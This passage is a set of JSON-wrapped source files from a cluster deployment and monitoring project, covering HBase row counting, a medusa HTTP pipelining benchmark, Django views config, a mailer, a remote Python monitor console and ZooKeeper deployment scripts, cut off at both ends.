now.day + 1, hour, 0)\n sleep_time = (next_day - now).total_seconds()\n \n logger.info(\"Sleep \" + str(sleep_time) + \" seconds\")\n time.sleep(sleep_time)\n \n def count_rows(self, cluster_name, table_name):\n logger.info(\"Count the rows of \" + table_name + \" in \" + cluster_name)\n\n try:\n # deploy shell hbase sdtst-miliao org.apache.hadoop.hbase.coprocessor.example.CoprocessorRowcounter _acl_ --speed=3000\n deploy_command = settings.DEPLOY_COMMAND\n command_list = [deploy_command, \"shell\", \"hbase\"] + [cluster_name] + [\"org.apache.hadoop.hbase.coprocessor.example.CoprocessorRowcounter\"] + [table_name] + [\"--speed=3000\"]\n\n rowcounter_process = subprocess.Popen(command_list, stdout=subprocess.PIPE)\n rowcounter_result = rowcounter_process.communicate()\n rowcounter_status = rowcounter_process.wait()\n\n # e.g. \"_acl_ 2014-4-18 3\"\n pattern = table_name + \" \\\\d+\\\\-\\\\d+\\\\-\\\\d+ (\\\\d+)\"; \n compiled_pattern = re.compile(pattern)\n re_result = compiled_pattern.search(rowcounter_result[0])\n return re_result.group(1)\n except:\n logger.error(\"Error to count rows, make sure kinit to run CoprocessorRowcounter and set DEPLOY_COMMAND\")\n return -1\n\n\n \n"
},
{
"alpha_fraction": 0.5019230842590332,
"alphanum_fraction": 0.5134615302085876,
"avg_line_length": 28.433961868286133,
"blob_id": "898dbdec4fe482a34ce31086b700984460b9ad2f",
"content_id": "90eef09a35595fd92be5a1d63cc2010891be5252",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1560,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 53,
"path": "/supervisor/supervisor/medusa/test/test_single_11.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\n# no-holds barred, test a single channel's pipelining speed\n\nimport string\nimport socket\n\ndef build_request_chain (num, host, request_size):\n s = 'GET /test%d.html HTTP/1.1\\r\\nHost: %s\\r\\n\\r\\n' % (request_size, host)\n sl = [s] * (num-1)\n sl.append (\n 'GET /test%d.html HTTP/1.1\\r\\nHost: %s\\r\\nConnection: close\\r\\n\\r\\n' % (\n request_size, host\n )\n )\n return string.join (sl, '')\n\nimport time\n\nclass timer:\n def __init__ (self):\n self.start = time.time()\n\n def end (self):\n return time.time() - self.start\n\nif __name__ == '__main__':\n import sys\n if len(sys.argv) != 5:\n print 'usage: %s <host> <port> <request-size> <num-requests>' % (sys.argv[0])\n else:\n host = sys.argv[1]\n [port, request_size, num_requests] = map (\n string.atoi,\n sys.argv[2:]\n )\n chain = build_request_chain (num_requests, host, request_size)\n import socket\n s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)\n s.connect ((host,port))\n t = timer()\n s.send (chain)\n num_bytes = 0\n while 1:\n data = s.recv(16384)\n if not data:\n break\n else:\n num_bytes = num_bytes + len(data)\n total_time = t.end()\n print 'total bytes received: %d' % num_bytes\n print 'total time: %.2f sec' % (total_time)\n print 'transactions/sec: %.2f' % (num_requests/total_time)\n"
},
{
"alpha_fraction": 0.6142131686210632,
"alphanum_fraction": 0.6192893385887146,
"avg_line_length": 18.700000762939453,
"blob_id": "3378502800fe881ef1dc811b8bb9f9c7c6260f31",
"content_id": "b755bfdfcae82e8cec91792f2937d42798029c51",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 10,
"path": "/owl/hbase/urls.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import patterns, url\nimport views\n\nurlpatterns = patterns(\n '',\n url(r'^$', views.index),\n url(r'^longhaul/(?P<id>\\d+)/$', views.show_longhaul),\n)\n"
},
{
"alpha_fraction": 0.7300469279289246,
"alphanum_fraction": 0.7453051805496216,
"avg_line_length": 16.387754440307617,
"blob_id": "31e8d2ddc7e3ece695490603763a0121a523ac3f",
"content_id": "7f73054f7ff7183a929fd737d0ba4d21c1a32c1d",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 852,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 49,
"path": "/supervisor/supervisor/medusa/debian/rules",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/make -f\n# Sample debian/rules that uses debhelper.\n# GNU copyright 1997 to 1999 by Joey Hess.\n\n# Uncomment this to turn on verbose mode.\n#export DH_VERBOSE=1\n\n# This is the debhelper compatibility version to use.\nexport DH_COMPAT=4\n\n\n\nbuild: build-stamp\n\t/usr/bin/python setup.py build\nbuild-stamp: \n\ttouch build-stamp\n\nconfigure:\n\t# Do nothing\n\nclean:\n\tdh_testdir\n\tdh_testroot\n\trm -f build-stamp\n\n\t-rm -rf build\n\n\tdh_clean\n\ninstall: build\n\tdh_testdir\n\tdh_testroot\n\tdh_clean -k\n\t/usr/bin/python setup.py install --no-compile --prefix=$(CURDIR)/debian/python2.3-medusa/usr\n\n# Build architecture-independent files here.\nbinary-indep: install\n\tdh_testdir\n\tdh_testroot\n\n\tdh_installdocs\n\tdh_installdeb\n\tdh_gencontrol\n\tdh_md5sums\n\tdh_builddeb\n# We have nothing to do by default.\n\nbinary: binary-indep \n.PHONY: build clean binary-indep binary install\n"
},
{
"alpha_fraction": 0.6107977628707886,
"alphanum_fraction": 0.6116035580635071,
"avg_line_length": 27.86046600341797,
"blob_id": "828c274d00887e28904a5af86a5207171d9446e1",
"content_id": "4320cc4a4cb789a27217ab6361c0ee1ceec7c578",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1241,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 43,
"path": "/owl/utils/mail.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import owl_config\nimport smtplib\nfrom email.mime.text import MIMEText\n\nclass Mailer:\n def __init__(self, options):\n self.options = options\n self.from_email = owl_config.ALERT_FROM_EMAIL\n self.smtp_host = owl_config.SMTPHOST\n self.password = owl_config.ROBOT_EMAIL_PASSWORD\n\n def send_email(self, content, subject, to_email, type='plain'):\n send_email(content = content,\n subject = subject,\n from_email = self.from_email,\n to_email = to_email,\n smtp_host = self.smtp_host,\n password = self.password,\n type = type,\n )\n\ndef send_email(subject, content, from_email, to_email, smtp_host, password, type):\n if not to_email:\n return\n\n msg = MIMEText(content, type)\n msg['Subject'] = subject\n msg['From'] = from_email\n to_emails = [addr.strip() for addr in to_email.split(',')]\n msg['To'] = ','.join(to_emails)\n\n connected = False\n try:\n smtp = smtplib.SMTP(smtp_host)\n if password:\n smtp.login(from_email.split('@')[0], password)\n connected = True\n\n smtp.sendmail(msg['From'], to_emails, msg.as_string())\n except Exception as e:\n print 'Send email failed: %r' % e\n if connected:\n smtp.quit()\n"
},
{
"alpha_fraction": 0.6468085050582886,
"alphanum_fraction": 0.6638298034667969,
"avg_line_length": 25,
"blob_id": "21e5e0fcdaed76ee13798b984d0b8ca0c2c679c7",
"content_id": "4d1f7bd01d000b69f08c17549e065f40105b9427",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 235,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 9,
"path": "/owl/runserver.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# '--insecure' is for serving static files in non-debug mode\n# $* is for set host:port\n\nsource \"$(dirname $0)\"/../build/minos_env.sh || exit 1\ncd $OWL_ROOT\n\n$ENV_PYTHON manage.py runserver --insecure $* > server.log 2>&1\n\n"
},
{
"alpha_fraction": 0.6768401861190796,
"alphanum_fraction": 0.6894075274467468,
"avg_line_length": 28.3157901763916,
"blob_id": "dc68c198707892852065560665597c208f7daf7f",
"content_id": "d6ea6edfcdfc353a0972e5700b9aa8ac6b1be80e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 557,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 19,
"path": "/owl/hbase/models.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom django.db import models\n\nclass Longhaul(models.Model):\n # The cluster name\n cluster = models.CharField(max_length=32)\n # The table name\n table = models.CharField(max_length=32)\n # the column family of the long hual\n cf = models.CharField(max_length=32)\n # the load description of the longhaul test\n description = models.TextField()\n\n def getCounterGroup(self):\n return u\"infra-hbase-longhaul-%s-%s-%s\" % (self.cluster, self.table, self.cf)\n\n def __unicode__(self):\n return u\"%s/%s\" % (self.cluster, self.table)\n"
},
{
"alpha_fraction": 0.4851841926574707,
"alphanum_fraction": 0.4934702217578888,
"avg_line_length": 31.089595794677734,
"blob_id": "5c32c8c9c65dd763c0fcfb62cdb97282d793d73e",
"content_id": "dc6fd86aba1eb86c5886e3907bbaf197e8fdaef2",
"detected_licenses": [
"Apache-2.0",
"HPND",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11103,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 346,
"path": "/supervisor/supervisor/medusa/monitor.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n# Author: Sam Rushing <[email protected]>\n\n#\n# python REPL channel.\n#\n\nRCS_ID = '$Id: monitor.py,v 1.5 2002/03/23 15:08:06 amk Exp $'\n\nimport md5\nimport socket\nimport string\nimport sys\nimport time\n\nVERSION = string.split(RCS_ID)[2]\n\nimport asyncore_25 as asyncore\nimport asynchat_25 as asynchat\n\nfrom counter import counter\nimport producers\n\nclass monitor_channel (asynchat.async_chat):\n try_linemode = 1\n\n def __init__ (self, server, sock, addr):\n asynchat.async_chat.__init__ (self, sock)\n self.server = server\n self.addr = addr\n self.set_terminator ('\\r\\n')\n self.data = ''\n # local bindings specific to this channel\n self.local_env = sys.modules['__main__'].__dict__.copy()\n self.push ('Python ' + sys.version + '\\r\\n')\n self.push (sys.copyright+'\\r\\n')\n self.push ('Welcome to %s\\r\\n' % self)\n self.push (\"[Hint: try 'from __main__ import *']\\r\\n\")\n self.prompt()\n self.number = server.total_sessions.as_long()\n self.line_counter = counter()\n self.multi_line = []\n\n def handle_connect (self):\n # send IAC DO LINEMODE\n self.push ('\\377\\375\\\"')\n\n def close (self):\n self.server.closed_sessions.increment()\n asynchat.async_chat.close(self)\n\n def prompt (self):\n self.push ('>>> ')\n\n def collect_incoming_data (self, data):\n self.data = self.data + data\n if len(self.data) > 1024:\n # denial of service.\n self.push ('BCNU\\r\\n')\n self.close_when_done()\n\n def found_terminator (self):\n line = self.clean_line (self.data)\n self.data = ''\n self.line_counter.increment()\n # check for special case inputs...\n if not line and not self.multi_line:\n self.prompt()\n return\n if line in ['\\004', 'exit']:\n self.push ('BCNU\\r\\n')\n self.close_when_done()\n return\n oldout = sys.stdout\n olderr = sys.stderr\n try:\n p = output_producer(self, olderr)\n sys.stdout = p\n sys.stderr = p\n try:\n # this is, of course, a blocking operation.\n # if you wanted to thread this, you would have\n # to synchronize, etc... and treat the output\n # like a pipe. Not Fun.\n #\n # try eval first. If that fails, try exec. If that fails,\n # hurl.\n try:\n if self.multi_line:\n # oh, this is horrible...\n raise SyntaxError\n co = compile (line, repr(self), 'eval')\n result = eval (co, self.local_env)\n method = 'eval'\n if result is not None:\n print repr(result)\n self.local_env['_'] = result\n except SyntaxError:\n try:\n if self.multi_line:\n if line and line[0] in [' ','\\t']:\n self.multi_line.append (line)\n self.push ('... ')\n return\n else:\n self.multi_line.append (line)\n line = string.join (self.multi_line, '\\n')\n co = compile (line, repr(self), 'exec')\n self.multi_line = []\n else:\n co = compile (line, repr(self), 'exec')\n except SyntaxError, why:\n if why[0] == 'unexpected EOF while parsing':\n self.push ('... ')\n self.multi_line.append (line)\n return\n else:\n t,v,tb = sys.exc_info()\n del tb\n raise t,v\n exec co in self.local_env\n method = 'exec'\n except:\n method = 'exception'\n self.multi_line = []\n (file, fun, line), t, v, tbinfo = asyncore.compact_traceback()\n self.log_info('%s %s %s' %(t, v, tbinfo), 'warning')\n finally:\n sys.stdout = oldout\n sys.stderr = olderr\n self.log_info('%s:%s (%s)> %s' % (\n self.number,\n self.line_counter,\n method,\n repr(line))\n )\n self.push_with_producer (p)\n self.prompt()\n\n # for now, we ignore any telnet option stuff sent to\n # us, and we process the backspace key ourselves.\n # gee, it would be fun to write a full-blown line-editing\n # environment, etc...\n def clean_line (self, line):\n chars = []\n for ch in line:\n oc = ord(ch)\n if oc < 127:\n if oc in [8,177]:\n # backspace\n chars = chars[:-1]\n else:\n chars.append (ch)\n return string.join (chars, '')\n\nclass monitor_server (asyncore.dispatcher):\n\n SERVER_IDENT = 'Monitor Server (V%s)' % VERSION\n\n channel_class = monitor_channel\n\n def __init__ (self, hostname='127.0.0.1', port=8023):\n asyncore.dispatcher.__init__(self)\n self.hostname = hostname\n self.port = port\n self.create_socket (socket.AF_INET, socket.SOCK_STREAM)\n self.set_reuse_addr()\n self.bind ((hostname, port))\n self.log_info('%s started on port %d' % (self.SERVER_IDENT, port))\n self.listen (5)\n self.closed = 0\n self.failed_auths = 0\n self.total_sessions = counter()\n self.closed_sessions = counter()\n\n def writable (self):\n return 0\n\n def handle_accept (self):\n conn, addr = self.accept()\n self.log_info('Incoming monitor connection from %s:%d' % addr)\n self.channel_class (self, conn, addr)\n self.total_sessions.increment()\n\n def status (self):\n return producers.simple_producer (\n '<h2>%s</h2>' % self.SERVER_IDENT\n + '<br><b>Total Sessions:</b> %s' % self.total_sessions\n + '<br><b>Current Sessions:</b> %d' % (\n self.total_sessions.as_long()-self.closed_sessions.as_long()\n )\n )\n\ndef hex_digest (s):\n m = md5.md5()\n m.update (s)\n return string.joinfields (\n map (lambda x: hex (ord (x))[2:], map (None, m.digest())),\n '',\n )\n\nclass secure_monitor_channel (monitor_channel):\n authorized = 0\n\n def __init__ (self, server, sock, addr):\n asynchat.async_chat.__init__ (self, sock)\n self.server = server\n self.addr = addr\n self.set_terminator ('\\r\\n')\n self.data = ''\n # local bindings specific to this channel\n self.local_env = {}\n # send timestamp string\n self.timestamp = str(time.time())\n self.count = 0\n self.line_counter = counter()\n self.number = int(server.total_sessions.as_long())\n self.multi_line = []\n self.push (self.timestamp + '\\r\\n')\n\n def found_terminator (self):\n if not self.authorized:\n if hex_digest ('%s%s' % (self.timestamp, self.server.password)) != self.data:\n self.log_info ('%s: failed authorization' % self, 'warning')\n self.server.failed_auths = self.server.failed_auths + 1\n self.close()\n else:\n self.authorized = 1\n self.push ('Python ' + sys.version + '\\r\\n')\n self.push (sys.copyright+'\\r\\n')\n self.push ('Welcome to %s\\r\\n' % self)\n self.prompt()\n self.data = ''\n else:\n monitor_channel.found_terminator (self)\n\nclass secure_encrypted_monitor_channel (secure_monitor_channel):\n \"Wrap send() and recv() with a stream cipher\"\n\n def __init__ (self, server, conn, addr):\n key = server.password\n self.outgoing = server.cipher.new (key)\n self.incoming = server.cipher.new (key)\n secure_monitor_channel.__init__ (self, server, conn, addr)\n\n def send (self, data):\n # send the encrypted data instead\n ed = self.outgoing.encrypt (data)\n return secure_monitor_channel.send (self, ed)\n\n def recv (self, block_size):\n data = secure_monitor_channel.recv (self, block_size)\n if data:\n dd = self.incoming.decrypt (data)\n return dd\n else:\n return data\n\nclass secure_monitor_server (monitor_server):\n channel_class = secure_monitor_channel\n\n def __init__ (self, password, hostname='', port=8023):\n monitor_server.__init__ (self, hostname, port)\n self.password = password\n\n def status (self):\n p = monitor_server.status (self)\n # kludge\n p.data = p.data + ('<br><b>Failed Authorizations:</b> %d' % self.failed_auths)\n return p\n\n# don't try to print from within any of the methods\n# of this object. 8^)\n\nclass output_producer:\n def __init__ (self, channel, real_stderr):\n self.channel = channel\n self.data = ''\n # use _this_ for debug output\n self.stderr = real_stderr\n\n def check_data (self):\n if len(self.data) > 1<<16:\n # runaway output, close it.\n self.channel.close()\n\n def write (self, data):\n lines = string.splitfields (data, '\\n')\n data = string.join (lines, '\\r\\n')\n self.data = self.data + data\n self.check_data()\n\n def writeline (self, line):\n self.data = self.data + line + '\\r\\n'\n self.check_data()\n\n def writelines (self, lines):\n self.data = self.data + string.joinfields (\n lines,\n '\\r\\n'\n ) + '\\r\\n'\n self.check_data()\n\n def flush (self):\n pass\n\n def softspace (self, *args):\n pass\n\n def more (self):\n if self.data:\n result = self.data[:512]\n self.data = self.data[512:]\n return result\n else:\n return ''\n\nif __name__ == '__main__':\n if '-s' in sys.argv:\n sys.argv.remove ('-s')\n print 'Enter password: ',\n password = raw_input()\n else:\n password = None\n\n if '-e' in sys.argv:\n sys.argv.remove ('-e')\n encrypt = 1\n else:\n encrypt = 0\n\n if len(sys.argv) > 1:\n port = string.atoi (sys.argv[1])\n else:\n port = 8023\n\n if password is not None:\n s = secure_monitor_server (password, '', port)\n if encrypt:\n s.channel_class = secure_encrypted_monitor_channel\n import sapphire\n s.cipher = sapphire\n else:\n s = monitor_server ('', port)\n\n asyncore.loop(use_poll=1)\n"
},
{
"alpha_fraction": 0.6965306997299194,
"alphanum_fraction": 0.698284387588501,
"avg_line_length": 40.24213790893555,
"blob_id": "d33a19a92abaabe27e485693be07d51516fc9480",
"content_id": "ce214f706b64a9ee2acba69c8989e5f79c1402f1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13115,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 318,
"path": "/client/deploy_zookeeper.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import deploy_utils\nimport os\nimport pwd\nimport subprocess\nimport sys\nimport tempfile\nimport time\n\nfrom log import Log\n\nMYID_FILE = \"myid\"\n\nSHELL_COMMAND_INFO = {\n \"zkcli\": (\"org.apache.zookeeper.ZooKeeperMain\",\n \"run the zookeeper client shell\"),\n}\n\ndef generate_zookeeper_config(args):\n config_dict = args.zookeeper_config.configuration.generated_files[\"zookeeper.cfg\"]\n local_path = \"%s/zookeeper.cfg.tmpl\" % deploy_utils.get_template_dir()\n template = deploy_utils.Template(open(local_path, \"r\").read())\n return template.substitute(config_dict)\n\ndef generate_jaas_config(args):\n if not deploy_utils.is_security_enabled(args):\n return \"\"\n\n config_dict = args.zookeeper_config.configuration.generated_files[\"jaas-server.conf\"]\n\n for key, value in config_dict.items()[1:]:\n if value != \"true\" and value != \"false\" and value.find(\"\\\"\") == -1:\n config_dict[key] = \"\\\"\" + value + \"\\\"\"\n\n header_line = config_dict[\"headerLine\"]\n return \"Server {\\n %s\\n%s;\\n};\" % (header_line,\n \"\\n\".join([\" %s=%s\" % (key, value)\n for (key, value) in config_dict.iteritems() if key != config_dict.keys()[0]]))\n\ndef generate_client_jaas_config(args):\n if not deploy_utils.is_security_enabled(args):\n return \"\"\n\n config_dict = args.zookeeper_config.configuration.generated_files[\"jaas-client.conf\"]\n\n for key, value in config_dict.items()[1:]:\n if value != \"true\" and value != \"false\" and value.find(\"\\\"\") == -1:\n config_dict[key] = \"\\\"\" + value + \"\\\"\"\n\n header_line = config_dict[\"headerLine\"]\n return \"Client {\\n %s\\n%s;\\n};\" % (header_line,\n \"\\n\".join([\" %s=%s\" % (key, value)\n for (key, value) in config_dict.iteritems() if key != config_dict.keys()[0]]))\n\ndef generate_run_scripts(args):\n config_files = dict()\n\n config_files.update({\n \"zookeeper.cfg\": generate_zookeeper_config(args),\n \"jaas.conf\": generate_jaas_config(args),\n })\n config_files.update(args.zookeeper_config.configuration.raw_files)\n\n return config_files\n\ndef generate_bootstrap_script(args, host, job_name, host_id, instance_id):\n supervisor_client = deploy_utils.get_supervisor_client(host,\n \"zookeeper\", args.zookeeper_config.cluster.name, job_name, instance_id=instance_id)\n data_dir = supervisor_client.get_available_data_dirs()[0]\n myid_file = \"%s/%s\" % (data_dir, MYID_FILE)\n\n hosts = args.zookeeper_config.jobs[\"zookeeper\"].hosts\n task_id = deploy_utils.get_task_id(hosts, host_id, instance_id)\n\n script_dict = {\n 'myid_file': myid_file,\n 'host_id': task_id,\n }\n return deploy_utils.create_run_script(\n '%s/bootstrap_zk.sh.tmpl' % deploy_utils.get_template_dir(),\n script_dict)\n\ndef generate_start_script(args, host, job_name, host_id, instance_id):\n supervisor_client = deploy_utils.get_supervisor_client(host,\n \"zookeeper\", args.zookeeper_config.cluster.name, job_name, instance_id=instance_id)\n run_dir = supervisor_client.get_run_dir()\n\n artifact_and_version = \"zookeeper-\" + args.zookeeper_config.cluster.version\n component_dir = \"$package_dir\"\n # must include both [dir]/ and [dir]/* as [dir]/* only import all jars under\n # this dir but we also need access the webapps under this dir.\n jar_dirs = \"%s/:%s/lib/*:%s/*\" % (component_dir, component_dir, component_dir)\n job = args.zookeeper_config.jobs[\"zookeeper\"]\n log_level = deploy_utils.get_service_log_level(args, args.zookeeper_config)\n\n params = job.get_arguments(args, args.zookeeper_config.cluster, args.zookeeper_config.jobs,\n args.zookeeper_config.arguments_dict, job_name, host_id, instance_id)\n\n script_dict = {\n \"artifact\": artifact_and_version,\n \"job_name\": job_name,\n \"jar_dirs\": jar_dirs,\n \"run_dir\": run_dir,\n \"params\": params,\n }\n\n return deploy_utils.create_run_script(\n '%s/start.sh.tmpl' % deploy_utils.get_template_dir(),\n script_dict)\n\ndef get_zk_service_config(args):\n args.zookeeper_config = deploy_utils.get_service_config(args)\n if args.zookeeper_config.cluster.zk_cluster:\n Log.print_critical(\n \"zookeeper cluster can't depends on other clusters: %s\" %\n args.zookeeper_config.cluster.name)\n\ndef install(args):\n get_zk_service_config(args)\n deploy_utils.install_service(args, \"zookeeper\", args.zookeeper_config, \"zookeeper\")\n\ndef cleanup(args):\n get_zk_service_config(args)\n\n cleanup_token = deploy_utils.confirm_cleanup(args,\n \"zookeeper\", args.zookeeper_config)\n\n hosts = args.zookeeper_config.jobs[\"zookeeper\"].hosts\n for host_id in hosts.keys():\n for instance_id in range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n deploy_utils.cleanup_job(\"zookeeper\", args.zookeeper_config,\n hosts[host_id].ip, \"zookeeper\", instance_id, cleanup_token)\n\ndef bootstrap_job(args, host, job_name, host_id, instance_id, cleanup_token):\n # parse the service_config according to the instance_id\n args.zookeeper_config.parse_generated_config_files(args, job_name, host_id, instance_id)\n bootstrap_script = generate_bootstrap_script(args, host, job_name, host_id, instance_id)\n deploy_utils.bootstrap_job(args, \"zookeeper\", \"zookeeper\", args.zookeeper_config,\n host, job_name, instance_id, cleanup_token, '0', bootstrap_script)\n\n # start job after bootstrapping.\n start_job(args, host, job_name, host_id, instance_id)\n\ndef bootstrap(args):\n get_zk_service_config(args)\n\n cleanup_token = deploy_utils.confirm_bootstrap(\"zookeeper\", args.zookeeper_config)\n hosts = args.zookeeper_config.jobs[\"zookeeper\"].hosts\n\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n bootstrap_job(args, hosts[host_id].ip, \"zookeeper\", host_id, instance_id, cleanup_token)\n\ndef start_job(args, host, job_name, host_id, instance_id):\n # parse the service_config according to the instance_id\n args.zookeeper_config.parse_generated_config_files(args, job_name, host_id, instance_id)\n\n config_files = generate_run_scripts(args)\n start_script = generate_start_script(args, host, job_name, host_id, instance_id)\n http_url = ''\n deploy_utils.start_job(args, \"zookeeper\", \"zookeeper\", args.zookeeper_config,\n host, job_name, instance_id, start_script, http_url, **config_files)\n\ndef start(args):\n if not args.skip_confirm:\n deploy_utils.confirm_start(args)\n get_zk_service_config(args)\n hosts = args.zookeeper_config.jobs[\"zookeeper\"].hosts\n\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n start_job(args, hosts[host_id].ip, \"zookeeper\", host_id, instance_id)\n\ndef stop_job(args, host, job_name, instance_id):\n deploy_utils.stop_job(\"zookeeper\", args.zookeeper_config,\n host, job_name, instance_id)\n\ndef stop(args):\n if not args.skip_confirm:\n deploy_utils.confirm_stop(args)\n get_zk_service_config(args)\n hosts = args.zookeeper_config.jobs[\"zookeeper\"].hosts\n\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n stop_job(args, hosts[host_id].ip, \"zookeeper\", instance_id)\n\ndef restart(args):\n if not args.skip_confirm:\n deploy_utils.confirm_restart(args)\n get_zk_service_config(args)\n hosts = args.zookeeper_config.jobs[\"zookeeper\"].hosts\n\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n stop_job(args, hosts[host_id].ip, \"zookeeper\", instance_id)\n\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n deploy_utils.wait_for_job_stopping(\"zookeeper\",\n args.zookeeper_config.cluster.name, \"zookeeper\", hosts[host_id].ip, instance_id)\n start_job(args, hosts[host_id].ip, \"zookeeper\", host_id, instance_id)\n\ndef show(args):\n get_zk_service_config(args)\n hosts = args.zookeeper_config.jobs[\"zookeeper\"].hosts\n\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n deploy_utils.show_job(\"zookeeper\", args.zookeeper_config,\n hosts[host_id].ip, \"zookeeper\", instance_id)\n\ndef run_shell(args):\n get_zk_service_config(args)\n\n main_class, options = deploy_utils.parse_shell_command(\n args, SHELL_COMMAND_INFO)\n if not main_class:\n return\n\n args.zookeeper_config.parse_generated_config_files(args)\n\n client_jaas = generate_client_jaas_config(args)\n jaas_fd, jaas_file = tempfile.mkstemp(suffix='zookeeper')\n os.write(jaas_fd, client_jaas)\n os.close(jaas_fd)\n zookeeper_opts = list()\n if deploy_utils.is_security_enabled(args):\n zookeeper_opts.append(\"-Djava.security.auth.login.config=%s\" % jaas_file)\n zookeeper_opts.append(\n \"-Djava.security.krb5.conf=%s/krb5-hadoop.conf\" %\n deploy_utils.get_config_dir())\n\n package_root = deploy_utils.get_artifact_package_root(args,\n args.zookeeper_config.cluster, \"zookeeper\")\n class_path = \"%s/:%s/lib/*:%s/*\" % (package_root, package_root, package_root)\n\n zk_address = \"%s:%d\" % (\n deploy_utils.get_zk_address(args.zookeeper_config.cluster.name),\n args.zookeeper_config.jobs[\"zookeeper\"].base_port)\n\n cmd = ([\"java\", \"-cp\", class_path] + zookeeper_opts + [main_class,\n \"-server\", zk_address] + options)\n p = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr)\n p.wait()\n\ndef generate_client_config(args, artifact, version):\n config_path = \"%s/%s/%s-%s/conf\" % (args.package_root,\n args.cluster, artifact, version)\n deploy_utils.write_file(\"%s/zookeeper.cfg\" % config_path,\n generate_zookeeper_config(args))\n deploy_utils.write_file(\"%s/jaas.conf\" % config_path,\n generate_client_jaas_config(args))\n deploy_utils.write_file(\"%s/krb5.conf\" % config_path,\n args.zookeeper_config.configuration.raw_files[\"krb5.conf\"])\n update_zk_env_sh(args, artifact, version)\n\ndef update_zk_env_sh(args, artifact, version):\n current_path = os.path.abspath(os.path.dirname(\n os.path.realpath(args.package_root)))\n jvm_flags = '-Djava.security.auth.login.config=$ZOOCFGDIR/jaas.conf '\n jvm_flags += '-Djava.security.krb5.conf=$ZOOCFGDIR/krb5.conf '\n\n bin_path = \"%s/%s/%s-%s/bin\" % (args.package_root,\n args.cluster, artifact, version)\n deploy_utils.append_to_file(\"%s/zkEnv.sh\" % bin_path,\n 'export JVMFLAGS=\"%s\"\\n' % jvm_flags)\n\ndef pack(args):\n get_zk_service_config(args)\n args.zookeeper_config.parse_generated_config_files(args)\n\n version = args.zookeeper_config.cluster.version\n deploy_utils.make_package_dir(args, \"zookeeper\", args.zookeeper_config.cluster)\n generate_client_config(args, \"zookeeper\", version)\n\n if not args.skip_tarball:\n deploy_utils.pack_package(args, \"zookeeper\", version)\n Log.print_success(\"Pack client utilities for zookeeper success!\")\n\ndef rolling_update(args):\n get_zk_service_config(args)\n job_name = \"zookeeper\"\n\n if not args.skip_confirm:\n deploy_utils.confirm_action(args, \"rolling_update\")\n\n Log.print_info(\"Rolling updating %s\" % job_name)\n hosts = args.zookeeper_config.jobs[job_name].hosts\n wait_time = 0\n\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or 